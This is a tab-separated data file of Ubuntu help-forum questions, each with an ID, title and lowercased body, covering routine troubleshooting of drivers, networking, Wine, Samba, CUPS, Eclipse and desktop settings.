237101	catia v5 under wine , screen flickers	i 'm a fairly novice ubuntu user and this is the first time i use this website . currently i 'm running an ubuntu 12.04 dual-boot ( together with windows 7 ) installation on my dell inspiron 1545 laptop configuration . the sole reason i still have n't migrated fully to ubuntu is that , as an engineer i have some special needs in terms of software . i 'm using a program called catia v5 for my work and i have successfully installed a v5r19 version using wine 1.5 . the installation runs smoothly , with one very very annoying issue which prevents me from being able to do my work . i experience screen flickering when using my program , almost constantly . i took a few steps to fix the problem , non of them helped ; adjusted the graphics card settings both for maximum performance and appearance ( i have ati radeon series 4300 chip , with proprietary drivers running , flgrx amd catalyst control centre ) installed latest updates for my os . adjusted the program visual settings any way i could think of followed instructions for proper installation here -- > http : //appdb.winehq.org/objectmanager.php ? sclass=version & iid=16156 & itestingid=50899 i was searching how to fix the issue for a long time now , with no success , nobody seems to either have it or bother to fix it i have a basic understanding of how to use a terminal and the syntax involved , but since i 'm no specialist in the area , i struggle with fixing this myself . i know its hard to find the solution to an issue such as this one , which i guess is a case one in a million , but i 'm ready to actively communicate with anyone who can help me out , and supply you with the information you need to work this out . i reach the conclusion that the problem is either located in the way wine handles the program or the os itself . i read somewhere that windows handles this graphics flickering faster , and users simply ca n't feel it . any help will be greatly appreciated ! thank you ! best regards , ventsy
237103	can the latest version of ubuntu run on a powermac g5 ?	can the latest version of ubuntu run on a powermac g5 ?
237107	how do symbolic links work in dropbox ?	i made some links to files in a folder . when i added that folder to dropbox , the links contained duplicate copies of the files linked to . have you had this problem ? do you understand what is happening ? is there a solution ? to make this question clearer : in the `` type '' column of the file manager , before connecting to dropbox , link_to_notes was shown to be a link and the size was 32 bytes . after connecting to dropbox , link_to_notes was shown to be a plain text document and the size was 18.7 kb , the size of the notes file .
237110	lightdm freezes at first startup	nearly every time i bootup my ubuntu i come to the login screen . but instead of showing me the wallpaper from selected account , i just see the default purple background with those white dots on it . anyway , at this screen i 'm neither able to login ( the text field does not accept input ) nor to shut down , because i am unable to click the icon in the upper left ( although i can move the mouse ) . to work arond this problem , i switch to a tty using strg+alt+f2 , login and reboot using sudo reboot . after a restart , i can log in normally , the login screen will appear with my account 's wallpaper . also installing gdm did n't solve this issue . i really tried a lot . i have this problem for about 2 months now and i 've reinstalled ubuntu 2 times during this period . i 've also tried 12.10 and have the same issue there . my hard drive is a wd carviar black and i use an asus motherboard with an amd cpu .
237111	can you make nautilus ask for verification before deleting a file ?	can you make nautilus ask for verification before deleting a file ? now if i hit the delete key by accident i lose the file .
237123	xubuntu install from cd on an old laptop	i have found my old compaq armada e500 laptop and i thought xubuntu would run fine on it . i burned a cd with xubuntu 12.10 32bit and loaded it up , but all i could hear is the constant seeking of the cd head , i could n't even reach the language selector menu . i tried burning the cd 3 times , even on rw media . i tried to defragment the iso before burning it to cd but none of them helped . this is not the first time i encountered this problem with a different laptop ( but that was old as well ) , i thought back then that the cd was poorly written . windows xp install , debian or gparted cd loads fine ( so the dvd rom should be ok ) on this e500 , and the xubuntu install cd load fine as well on a lenovo x230 and does not seek a lot . is it possible that i need to write the cd with different settings so that it works well in an older ( 9-10 years old ) dvd-rom ? i burned the cd with 16x speed , with infrarecorder ( in windows 7 ) .
237125	wireless networking features not working on 12.10 dual booting with windows 8	before i begin , i should probably say that i 'm fairly new to ubuntu , so please forgive me if i miss something obvious . i recently figured out how to dual boot ubuntu 12.10 with windows 8 on a lenovo ideapad yoga 13 . however , when i tried to connect to my home wifi network through the icon at the top right , i saw the message `` no network devices available . '' i suspect this may be a driver issue . i checked in software sources under additional drivers , and found that no drivers were listed . does anyone know anything about this ? update : i believe that iwconfig was the correct command , because it returned this : lo no wireless extensions .
237130	speeding up copying between harddrives	i have about 15gb of data that i wish to copy from my ntfs external harddrive connected via usb to the ext4 partition of my harddrive . while copying from my laptop 's ntfs harddrive the rate was about 20mb/s . in the opposite direction , however , the rate is about 3mb/s . am i missing something important or is there something wrong ?
237131	how can i override passwd 's checks for good passwords ?	i have an encrypted /home and just had to reinstall ubuntu . problem is , my /home partition is encrypted with my old password , which is short , and my new system has a new password on it . i could fix this by setting my old password on the new system , and but passwd wo n't allow me to change the password to something short . is there a way to override passwd 's checks ?
237133	custom lubuntu iso errors	i am working on a project for which i need to make a specific and lightweight linux distribution . i have made a custom livecd iso based on lubuntu 12.04 for my project , and when i try running it in virtualbox 4.2.6 it starts all right and gives the boot options menu : however , when i check the disk for defects , it says there is one : i need to know exactly which file the problem is in . it also will not start the livecd system or installer , supposedly for some sort of bios problem : please note : i have a deadline on this project .
237134	how to wake-up / suspend ( or switch-off ) ubuntu 12.10 desktop system automatically at a particular time of the day ?	currently , i keep my ubuntu 12.10 desktop system continuously running as i have to download some data at a particular time which generally takes half an hour . in order to save the power ( electricity ) question : : how can i wake-up my system ( from suspended or switched off mode ) at a particular time i.e . 2:15 am ( everyday ) and and put it in a suspension mode or switched off mode at a particular time i.e . 3:15 am ( everyday ) only if the keyboard or mouse activity is not detected for particular period i.e . 15 minutes. ? n.b . the system is connected with internet with router which has `` always on '' connection .
237140	failed to fetch repositories	i am having trouble downloading the ubuntu repositories : $ sudo apt-get update ... failed to fetch http : //archive.ubuntu.com/ubuntu/dists/maverick/main/binary-amd64/packages.gz 404 not found failed to fetch http : //archive.ubuntu.com/ubuntu/dists/maverick/restricted/binary-amd64/packages.gz 404 not found ... i can connect to the server fine : # ping archive.ubuntu.com ping archive.ubuntu.com ( 91.189.92.202 ) 56 ( 84 ) bytes of data . 64 bytes from sudice.canonical.com ( 91.189.92.202 ) : icmp_req=1 ttl=52 time=149 ms 64 bytes from sudice.canonical.com ( 91.189.92.202 ) : icmp_req=2 ttl=52 time=149 ms 64 bytes from sudice.canonical.com ( 91.189.92.202 ) : icmp_req=3 ttl=52 time=149 ms -- - archive.ubuntu.com ping statistics -- - 3 packets transmitted , 3 received , 0 % packet loss , time 2001ms rtt min/avg/max/mdev = 149.221/149.305/149.355/0.321 ms here is my sources.list : deb http : //archive.ubuntu.com/ubuntu maverick main restricted universe deb http : //archive.ubuntu.com/ubuntu maverick-updates main restricted universe deb http : //archive.ubuntu.com/ubuntu maverick-security main restricted universe and system details : lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 10.10 release : 10.10 codename : maverick any ideas ?
237144	installing ubuntu with the windows installer	after installation of ubuntu 12.10 , during restart the boot menu does not appear . computer automatically loads windows xp .
237145	samba does n't work upon boot until restart of service	i 've installed a samba server using ubuntu server as the os . when the computer starts , smbd and nmbd both start correctly . however , if i go to a client and type : $ smbclient -l feynman i get : enter chris 's password : connection to feynman failed ( error nt_status_unsuccessful ) if i then go to the server and restart the smbd service , it works correctly . i have the server configured to share a usb drive ; is it possible that it 's starting before the usb drive is available ? i do n't see anything interesting in smbd.log .
237150	ubuntu keeps showing the install window after restarting from installing ( better description below )	today i installed ubuntu on my computer ( blank 1tb hard drive/no os before ) and when ever it 's done installing it asks to re-boot/restart and i click re-boot but when ever it finishes it loads and asks , `` would you like to try ubuntu or install it '' . this has happend to me everytime i install ( 3 times ) . this is very complicated because i would like to just install once and keep all of the info i typed earlier , please answer it would be greatly appreciated . p.s : im running on ubuntu 12.10
237155	better way to select window from gnome-3 expose ?	i hate having to use the mouse to select the window to focus after spreading all the windows . i 'd have thought logically the arrow keys would allow you to select the window to go back into but no . is there any way to set it in gnome-3 so that i can select my focus window from the expose menu with the keyboard ?
237162	why when copying to an external drive the progress window is not correct	feel free to edit the title to explain better what i am going to write here . when i copy big files to a pen drive for example , the progress window shows an estimate that most of the time does not fail to show the real time and percent to finish , but there are cases where it says everything is finished and the progress window closes . i go to extract the pen drive and it says it is still in use . after checking the pen drive i see it is still copying the files but there is no progress window showing this . it does not only happen with big files , it also happens with many small files . if i copy them , the progress bar might say 15 seconds for example and finish in that time , but the real time might be 1 minute and for the next 45 seconds i need to actually look at the light in the pen drive to see if there is real activity on it . i do not want to know how to fix it since i have read how deep a fix for this could go . what i want to know is why does then the progress window show an estimate that does not correspond with the process of copying . is it dependent of the cache in the external unit ? is the file size and amount of file influence on the correct estimation . for example 1 file of 4 gb or 1000 files of 4 mb . is there configuration options that can change the behavior . there are other questions similar to this like copying files to usb stick never finished but am more focus on the mechanics into why it would behave like this .
237166	how does one show all applications when choosing an application to open a file with ?	i am trying to open a file of an unknown type ( pokemon gold.gbc ) . i double click it and get the message `` could not display '/home/josh/downloads/pokemon roms/pokemon gold.gbc ' . the file is of an unknown type . '' i click `` select application '' and then `` show other applications . '' however , not all of my applications are listed there , and neither is the one that i want ( vba-m [ package name vbam-gtk ] ) . how can i get all of my installed applications to show in this menu so that i do not have to open the file from the desired program , i can just launch it by double-clicking the file in nautilus ? update : i found out that the application can be launched from /usr/bin/vbam or from /usr/share/applications/vba-m or command line : gvbam additional details : i installed this package from a .deb file i got from sourceforge , not from the repositories ( the gameboy emulator in the repositories is not satisfactory ) . so is there at least a way that i can select the executable file to open the unknown file with ? update 2 : i have tried everything in the first answer below to no avail . as a temporary fix , i have changed the file extension from .gbc to .gb and so far everything seems to be working fine . however , i do not want to stay this way as i do not know if this will cause any problems .
237170	awstats icons are not showing / error 404	edit : this is the solution should anyone have the same problem after installing and configuring awstats from the repository , and following instructions from here https : //help.ubuntu.com/community/awstats it will work fine , except the pictures/icons will not be shown ( you will get an error 404 ) . the proposed configuration of /etc/apache2/sites-available/default is alias /awstatsclasses `` /usr/share/awstats/lib/ '' alias /awstatsicons/ `` /usr/share/awstats/icon/ '' alias /awstatscss `` /usr/share/doc/awstats/examples/css '' scriptalias /awstats/ /usr/lib/cgi-bin/ options execcgi -multiviews +symlinksifownermatch but the actual url when i open an image is http : //example.com/awstats-icon/other/awstats_logo6.png edit the default file to make this line has a - and no `` s '' after `` icon '' : alias /awstatsicons/ to /awstats-icon/ then save the file and reload apache2 sudo /etc/init.d/apache2 reload . icons should not be visible .
237172	how can i play drakensang online on ubuntu 12.10 ?	i play a java-based browser game known as drakensang online . i 've tried icedtea and java runtime as well as using wine to install the launcher . none of these have worked so far . i was using windows 7 and after a harddrive malfunction switched to ubuntu because its free to install and i love it but i am having difficulties with this one issue .
237173	lenovo y400 ubuntu 12.04 ca n't change brightness	the ubuntu seems to be always on the max brightness . i can not change the brightness . really strange . what i have tried : 1 install the latest nvidia driver does not work 2 change x sudo gedit /etc/x11/xorg.conf section `` device '' identifier `` default device '' driver `` nvidia '' option `` nologo '' `` true '' option `` registrydwords '' `` enablebrightnesscontrol=1 '' endsection this would make the fn+ key successfully change the value of /sys/class/backlight/acpi_video0/brightness and actual_brightness however the brightness will still stay the maximum .
237174	how to force subtitles in vlc to display at bottom	i need some help in forcing subtitles to be displayed at the bottom ( to be exact , in those black bars ) . i 've tried the tools- > preferences and then subtitles option- > i 've tried by giving 150px , but subtitles are still being displayed on the image ( movie ) . could anyone help me in doing this ?
237179	adding ubuntu 12.10 windows management feature to ubuntu 12.04 ?	i tried 12.10 and i decided to stay to with 12.04 . the only thing i liked on 12.10 was when all the windows you have open , you could spread all out and close the windows you did n't want to keep . you use the windows key with w to do this i think . is there a way to add this feature to 12.04 without upgrading to 12.10 ?
237180	ubuntu freezes when i copy/move file into home folder	since yesterday when i open the home folder and i try to copy , move , cut a file from there , the screen freezes , i 'm not able to click in any icon or menu , but ctrl+alt+f1 still work , and when i return to the gui ( by pressing ctrl+alt+f7 ) , the screen turns black and only showing the mouse cursor . this happens only in my session and strangely , is the only folder where happening this , even when i copy or move a file from other folder to home , without opening the home ( by bookmark or address bar ) . i tried to move all the files ( not the folders ) in home to other folder from another session , and it worked , but back on my session i still have the same problems . i had no problems when i open these files ( mostly of them images ) , before and after i have moved them , except with the .odt files , libreoffice also freezes the screen when i try to open it ( or a .odt file ) . i have lo from ppa , so i purge it , but nothing changed , and obviously , when i open these files and lo from another session , works perfectly ... to sum up , the home 's files and the libreoffice suite freezes the screen . halp ! i have 12.04 , and i use gnome fallback . fixed ... or i thing so . the problem has been in the file watcher compiz 's plugin , i turn off this and everything 's fine now . all 's ok except i still do not know what doing this plugin ... beside freeze the screen : p i leave here the x.org 's log 's file , a bit late , and i do n't know if it 's related to the problem or not , but is the only one i find apparently related in the /var/log .
237181	ubuntu 12.04 wired connection not working	i am a beginner to linux and ubuntu , and my laptop currently dual-boots ubuntu 12.04 and windows 7 . neither of my wired and wireless connections are working . my wired network was working , but when i was searching for a solution to my wireless connection problem , it also stopped working . not only did the wired connectioin stop working for ubuntu , it also stopped working for windows . : ( i checked my lan connection , and it seems fine - the cable was working fine seconds ago , and lights were flashing inside the port . it 's worth noting that the computer repeatedly connects to the network - only to disconnect seconds later . anyway , from where i looked , the following information seems to be required : ifconfig : eth0 link encap : ethernet hwaddr f0 : de : f1:65:74 : d1 inet6 addr : fe80 : :f2de : f1ff : fe65:74d1/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:448 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:98250 ( 98.2 kb ) interrupt:41 base address:0x8000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:631 errors:0 dropped:0 overruns:0 frame:0 tx packets:631 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:44610 ( 44.6 kb ) tx bytes:44610 ( 44.6 kb ) wlan0 link encap : ethernet hwaddr 8c : a9:82 : bd:5d : ac inet6 addr : fe80 : :8ea9:82ff : febd:5dac/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:840 errors:0 dropped:0 overruns:0 frame:0 tx packets:936 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:349062 ( 349.0 kb ) tx bytes:131132 ( 131.1 kb ) sudo lshw -c network : *-network description : wireless interface product : centrino wireless-n 1000 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 00 serial : 8c : a9:82 : bd:5d : ac width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-32-generic firmware=39.31.5.1 build 35138 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:43 memory : d0500000-d0501fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 05 serial : f0 : de : f1:65:74 : d1 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8105e-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:41 ioport:2000 ( size=256 ) memory : d0404000-d0404fff memory : d0400000-d0403fff i had tried using gksu gedit /etc/network/interfaces and adding auto eth0 iface eth0 inet dhcp but it did n't do anything . edit : it turned out that this problem was caused by the bad university lan - after a while , it magically started working again .
237186	ubuntu 12.10 wireless adapter problem	any one know how to hard unlock wireless adapter in ubuntu 12.10 i have toshiba satellite laptop c640 with dual boot . the wireless adapter works fine in windows . but in ubuntu it shows `` disabled by hardware '' . i tried rfkill unblock all . then nothing happened to the lock . i checked `` lspci | grep wireless `` it shows the wireless device .
237188	show/hide the top panel with a keybind ?	i 'm using a computer with very little screen space available . i 'd like to be able to hide the top panel on a keypress while i work so i can grab a little extra room for the window i 'm using . is there something like i described ? or even a hot-top where mousing over the top of the screen brings the panel back would be acceptable . i am running gnome 3.4 not unity !
237193	ubuntu 12.10 gtk themes not fully applied	i try to apply several themes downloaded from this list : http : //www.upubuntu.com/2012/07/a-list-of-best-15-ubuntu-1204-themes.html but the themes looked so weird when applied , especially the icon and menu bar . it seemed that the theme are not fully applied ( i assume ) . because when i browse into one of the theme folder ( example slave ) , there is an icons folder , but no changes on icons when it was applied here is the preview : i hope it can be solved soon . it 's frustrating to have buggy desktop appearance .
237196	compiled package and dependency management	i have a package that depends on squid 3.2 . i want to replace squid 3.2 with source compiled version of squid 3.3 beta ( which is not available in repository ) . when i remove squid 3.2 , the depending package is also getting removed . how can i mark the squid 3.2 dependency as manually resolved ? is that the purpose of the command aptitude umarkauto ?
237198	ubuntu 12 'connect to server ... ' with key	on my ubuntu 12 installation i 'd like to 'connect to server ... ' from the file explorer via ssh but the particular server i want to connect to requires a key . i know how to ssh via the command line specifying the key but how can i do this with the gui ? thanks .
237202	ubuntugis demands a partial upgrade ? is this safe ?	i would like to do some gis in ubuntu . when i use the repo : sudo apt-add-repository ppa : ubuntugis/ubuntugis-unstable update manager asks me to do a partial upgrade . the packages it wants to install are : cgi-mapserver grass libxml2 libxml2-dev libxml2 : i386 mapserver-bin php5-mapscript python-libxml2 python-mapscript i use my machine for many purposes besides just gis . so , i 'd rather not go messing anything up -- -in particular , other python projects . ( also , i have a 64-bit machine -- -libxml2 : i386 looks 32-bit maybe ? problem ? ) trying to be more conservative , i notice that when i use the repo : sudo apt-add-repository ppa : ubuntugis/ubuntugis-stable it says the repo does not exist . can not access ppa ( https : //launchpad.net/api/1.0/~ubuntugis/+archive/ubuntugis-stable ) to get ppa information , please check your internet connection . update i learned that the second ppa i had for the stable version is wrong . it 's : sudo apt-add-repository ppa : ubuntugis/ppa however , even this stable version asks me to perform a partial upgrade . so , the greater question stands : is this partial upgrade safe ? !
237203	ati driver installer screen missing nearly all text , how do i resolve this ?	i am using 64-bit ubuntu 12.10 on a dell 7520 , intel core i5 3210 , ati 7730m , 4gb ddr3 i downloaded ati catalyst software driver for linux ( amd-driver-installer-catalyst-12.10-x86.x86_64.run ) , but when i run it using sudo ./amd-driver-installer-catalyst-12.10-x86.x86_64.run the application window is visible but no text is seen : i want to know weather extra fonts are needed or something else . please tell me how . thank you .
237205	can not boot into windows 8	i have dual boot ubuntu 12.04.1 and windows 8 pro ( both are x64 ) . before i installed ubuntu everything worked fine , but when i installed it , it also installed grub . when the computer starts it says `` bootmgr is missing . press ctrl+alt+del to restart '' . i press that and press f11 ( system recovery ) before that appears . it opens grub ( i can boot into ubuntu if i insert nomodeset in the command ) , but it wo n't boot into windows 8 . there 's a screen which has : ( and some text ( can not start windows 8 - we 're collecting information or something like that - could n't see it ) . what should i do ? can i get rid of grub which is ugly and use windows 's bootloader ?
237207	shell script to install and run	i am trying to make an automatic installer which downloads file from ftp and installs it on system . host = `` zzz `` user= `` ss '' passwd = `` xxxx '' file = `` *.tar '' ftp $ host < < eof user $ user passwd $ passwd -- - # to save in folder /tmp cd /tmp mget $ ( ls -t | head -1 ) -- # to get last file eof . is this code is proper ? and how will i know that the download has finished ? should i make any code changes for that ? because as soon as its finished downloading i have to install it using sudo dpkg . how to use this command in my existing code which i have written above ?
237209	how to create option to insert time stamp ?	while editing text documents i need to put time stamps frequently . i thought of automating it in 2 different ways . none of these seem to be working . using nautilus-actions i set up a new right-context action which runs the command date|xclip this right-context does n't show up when i right click in other applications ( such as terminal , or browser ) . moreover when it appears , and i click on it , it does n't do anything . using keyboard shortcut i setup a new keyboard shortcut which is supposed to execute date command but does n't . any pointers ? thanks .
237215	why wo n't rhythmbox work ?	i 'm using ubuntu 12.04 lts and found out that rhythmbox wo n't work -- it keeps saying that it requires plugins but everytime i lookup mp3 plugins it appears that the ones that are all needed are already installed -- what do i do fr . here ? help ! ! ! p.s . : i 'm a newbie so any handholding would be deeply appreciated . : )
237219	how to properly import rhythmbox playlists into itunes on vm ?	i 'd done this succesfully before but this time i just ca n't make it work . i 'm running rhythmbox on ubuntu 12.04 to listen to all my stuff but to sync my ipod touch 4g i use virtualbox to run itunes . i added my music as shared folder which is then mounted as a network folder as e : on the virtual windows but when i import those playlists they are empty . some time ago it used to work but after reinstalling the virtual machine it stoped working . i 've seen that `` rename paths '' solution but it wo n't be useful since i need to update my recently added rhythmbox playlist periodically and it would be a mess . plus , it worked before , i just have to figure out what settings/formats do it . thanks in advance .
237220	cant launch eclipse in ubuntu 12.04	i am getting a message which says to refer log in .eclipse in home directory here is the contain of the log ( stack trace ) ... . ! session 2013-01-07 13:03:32.749 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=i20110613-1736 java.version=1.7.0_10 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86 , ws=gtk , nl=en_in command-line arguments : -os linux -ws gtk -arch x86 ! entry org.eclipse.osgi 4 0 2013-01-07 13:03:33.673 ! message application error ! stack 1 java.lang.unsatisfiedlinkerror : could not load swt library . reasons : no swt-gtk-3740 in java.library.path no swt-gtk in java.library.path ca n't load library : /home/abs/.swt/lib/linux/x86/libswt-gtk-3740.so ca n't load library : /home/abs/.swt/lib/linux/x86/libswt-gtk.so at org.eclipse.swt.internal.library.loadlibrary ( library.java:285 ) at org.eclipse.swt.internal.library.loadlibrary ( library.java:194 ) at org.eclipse.swt.internal.c. < clinit > ( c.java:21 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:63 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:54 ) at org.eclipse.swt.widgets.display. < clinit > ( display.java:132 ) at org.eclipse.ui.internal.workbench.createdisplay ( workbench.java:695 ) at org.eclipse.ui.platformui.createdisplay ( platformui.java:161 ) at org.eclipse.ui.internal.ide.application.ideapplication.createdisplay ( ideapplication.java:153 ) at org.eclipse.ui.internal.ide.application.ideapplication.start ( ideapplication.java:95 ) at org.eclipse.equinox.internal.app.eclipseapphandle.run ( eclipseapphandle.java:196 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.runapplication ( eclipseapplauncher.java:110 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.start ( eclipseapplauncher.java:79 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:344 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:179 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:601 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:622 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:577 ) at org.eclipse.equinox.launcher.main.run ( main.java:1410 )
237221	hp pavilion no wireless w/ubuntu 12.10 and a wired connection is n't possible . is there a download could get with my windows comp and put on usb key	i have no wireless connection with ubuntu 12.10 . using a hp pavilion dv6000 . i have read other responses to this question . however a wired connection is not an option for me . i do have another comp available and could download to a usb key if possible
237226	/var/log/cups keeps increasing while the cups service is stopped	i want to stop cups service on my 12.04 ubuntu : sudo service cups stop it 's stopped . i check it 's status by : chkconfig it 's off but /var/log/cups size is still increasing by a large amount each minute . i am running out of disk space , what can i do to stop this ? ls -lhs /var/log/cups/ | head total 1.5g -rw-r -- -- - 1 root adm 1.5g jan 7 12:50 error_log -rw-r -- -- - 1 root adm 8.1m jan 7 11:14 error_log.1.gz -rw-r -- -- - 1 root adm 587 dec 30 07:37 access_log.1.gz -rw-r -- -- - 1 root adm 259 dec 29 07:59 aacess_log.2.gz -rw-r -- -- - 1 root adm 258 dec 28 07:41 aacess_log.3.gz -rw-r -- -- - 1 root adm 255 dec 27 07:23 aacess_log.4.gz -rw-r -- -- - 1 root adm 252 dec 26 07:04 aacess_log.5.gz -rw-r -- -- - 1 root adm 245 dec 29 14:34 error_log.2.gz -rw-r -- -- - 1 root adm 230 dec 25 07:44 aacess_log.6.gz
237228	detailed instruction on how to make virtual packages	the problem is that i have vanilla texlive installed from the internet . however when i want to install a program like lyx , it says this : the following new packages will be installed : dvipng latex-beamer latex-xcolor lmodern lyx lyx-common pgf preview-latex-style prosper ps2eps tex-common texlive-base texlive-binaries texlive-common texlive-doc-base texlive-extra-utils texlive-font-utils texlive-fonts-recommended texlive-fonts-recommended-doc texlive-generic-extra texlive-generic-recommended texlive-latex-base texlive-latex-base-doc texlive-latex-extra texlive-latex-extra-doc texlive-latex-recommended texlive-latex-recommended-doc texlive-pictures texlive-pictures-doc texlive-pstricks texlive-pstricks-doc texlive-science texlive-science-doc tipa i 'm sure that latex-beamer , latex-xcolor and other ones installed as i have a full installation . the question is how to make a virtual package system-wide from what i have already on my computer . ubuntu should detect and recognize it as an installed package . also the package should be updated when i forinstance use tlmgr update -- all . could someone shed some light on this issue ?
237230	tv screen disconnect when playing sound over hdmi	i just spent hours to configure the sound to work with hdmi . my last problem is , when i start playing sound the tv screen goes on and off , like when you change the resolution . when i stop playing sound , 3-5 seconds after , the same thing happen . i feel like everytime i play/stop the sound , the hdmi connection needs to be resetted . really annoying ! to enable the sound over hdmi , i have done : pactl set-card-profile 0 output : hdmi-stereo which basically set the pulse audio profile to hdmi .
237234	problem with jdk 6 and tomcat 7	i installed tomcat 7 and am using jdk 6 when i start tomcat7 i get this sudo service tomcat7 start * starting tomcat servlet engine tomcat7 start-stop-daemon : unable to start /usr/lib/jvm/openjdk-6-jdk/bin/java ( no such file or directory ) [ ok ] java and javac have symlinks in usr/bin .
237243	no sound at all on ubuntu 12.10	sound is n't working at all , except when i connect my headset . i think it 's hardware problem ? what can i do to fix it ? i have a thinkpad with hda intel pch . i even tried filling a bug report , but now i think i should n't have as it majorly seems to be a hardware support problem . also , a guy posted something on the bug report that i ca n't make sense of ( feeling so ~n00b right now [ ._ . ] ) . i think i am supposed to patch something , not really sure : ( thanks .
237245	what are the differences between mythbuntu and mythtv ?	i 've heard about both , however i 've never been able to distinguish how they are distinct , mythbuntu as i see it is used as a desktop environment , whereas mythtv seems to be installed on a tv itself with an equivalent app on the mythbuntu desktop . i may be entirely wrong in making this assumption though . i 've also heard of mythbuntu being used as a `` frontend `` with mythtv as a `` backend `` if someone could clarify this concept i 'd be quite grateful as for me i thought mythtv also qualified as a `` frontend '' . in short : how are mythbuntu and mythtv related and what are their major differences ? what are the definitions of a frontend and backend in the case of mythbuntu and mythtv ? is mythbuntu required for mythtv to work ? i 've already read the following questions but i 've got very basic knowledge on this issue and none really explain things in an average joe-esque way for users with little knowledge on the subject . how do i connect a mythtv frontend to a mythtv backend on mythbuntu 11.10 ? how do i install mythtv on a lenovo s12 with wireless ? mythmote wont connect to mythbuntu 12.04 , seems frontend is not listening on all interfaces
237247	how to solve random crash issues ( 12.10 server )	i tried to set up a server running ubuntu ( currently 12.10 x86_64 but already tried with 10.04-12.04 some with x86 too , all did the same ) but i always get random crashes after a while the system tells me i need to restart , after this massage appears , if i restart the system it wo n't reboot normally ( neither graphical output nor remote access possible ) and i need to restart it again , and then it works again if i do n't restart the system in 1-2 days it will become unresponsive ( again seems running but no graphical output , neither any remote access ) its not supposed to be a hardware issue since it ran 35 days on windows server on quite heavy load without any malfunctions another stange thing if i run java applications it crashes in 24 hours no matter what so my main question would be how to tell what is causing the crash ( the only strange thing i ever found in the logs is that there are lots of messages about a non existant bluetooth card ) any help would be appriciated
237249	how to prevent xbmc from shutting down or suspending your computer ?	since i run xbmc as a program , and not standalone , i would just like it to exit when i click the power button . the default behavior is to show the shutdown menu , and i do n't want to accidently shut down my computer .
237250	how do i get a list of non-lts packages installed efficiently ?	i 'd like to see to what extent my system is lts-supported by means of what packages are supported for 5 years and which are not . i could disregard some non-5yr-supported packages , as some are rarely used or very unlikely to get into ( security ) issues . i think this is useful as one can get a report and draw a conclusion , e.g . `` my system is 100 % lts '' , `` due to packages x , y , z , my system is just 99 % lts '' , `` due to the use of kde , my system is now 50 % lts '' . as related to my answer in the question does 12.04 lxde have lts ? , i posted a way to see which packages of ubuntu feature five years of support . e.g . : $ apt-cache show unity | grep ^supported supported : 5y $ apt-cache show lxde-core | grep ^supported < no output > i could write a script to get all information for all the packages , however , the apt-cache commands are horribly slow : real 0m1.535s user 0m1.484s sys 0m0.036s with 2700+ packages installed , this would take roughly 70 minutes ( ! ) . how can i speed up things and get a report for all non-5yr-supported packages on my system ? i 'd prefer a simple apt-* shell command for the use in a simple shell script . if it would require more advanced scripting like going into python , this is fine too . eventually , i would like to release a ( small ) script to create a report on a system easily and quickly . note : i 'm not interested in the discussion about whether or not a specific flavour of ubuntu provides lts or not - this is really just packages . you can just mix lts and non-lts packages on a system .
237251	how do i remap the search button on my logitech mx400 ?	i have a logitech mx400 wireless . it has a search button i would like to use for pasting ( instead of the extremely sensitive but hard to press scroll wheel ) . i already remapped other buttons with xbindkeys , and used xev to find the button press code , but this does not work for the search button . using xev and clicking the search button i get the following events focusout event , serial 34 , synthetic no , window 0x3c00001 , mode notifygrab , detail notifyancestor focusin event , serial 34 , synthetic no , window 0x3c00001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 34 , synthetic no , window 0x0 , keys : 4294967275 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 propertynotify event , serial 34 , synthetic no , window 0x3c00001 , atom 0x1d7 ( _net_wm_icon_geometry ) , time 23653064 , state propertynewvalue no buttonpress events . it seems that the search button is intercepted at a level below the x events . any ideas ? i have ubuntu 12.04 . ubuntu actually sees the click and spawns a search dialog , but there 's no trace of a click event in the xev . edit i checked the method provided with xmodmap . my .xmodmap now contains the following line keycode 225 = xf86paste nosymbol xf86paste `` running xmodmap ~/.xmodmap now disables the button altogether ( or at least , i do n't get any result by pressing it ) . i tried xmodmap -pke and it prints out : keycode 225 = xf86paste nosymbol xf86paste nosymbol xf86paste strange enough . all the other entries are similarly formatted . i am close to the solution 